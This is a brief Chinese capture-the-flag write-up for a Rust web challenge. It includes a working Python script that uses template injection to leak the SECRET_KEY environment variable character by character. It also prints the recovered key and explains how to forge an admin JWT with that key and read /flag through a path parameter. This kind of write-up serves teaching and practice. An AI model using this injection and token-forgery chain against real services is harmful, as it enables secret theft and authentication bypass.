#

也是挺新奇的,居然出 rust 的题目
用脚本跑出密钥
以下是 rust 模板注入脚本

import string
import time

import requests

url = "https://fc7fbb5d64-db8984aadc-3.hn2024.thudart.com/text"


def getflag(re):
    payload = """text={%for%20char%20in%20get_env(name="SECRET_KEY")%}{%if%20char%20is%20matching('tttt')%20%}1{%else%}0{%endif%}{%endfor%}""".replace("tttt", re)
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    result = requests.post(url, data=payload, headers=headers, verify=False).text
    if "1" in result:
        print(re, result)
        return True
    return False


s = string.printable
flag = ""

for i in s:
    time.sleep(0.5)
    getflag(i)

以下数字按顺序来看 1-20
1-D
2-A
以此类推最终得出密钥
DAPqYZUDHpHzPxvHpKjfRLMj

然后在 jwt.io 修改获取到了 jwt,改为 admin,最后在 /text 目录下,填写用 key 生成的 cookie,path 读取 /flag 就行了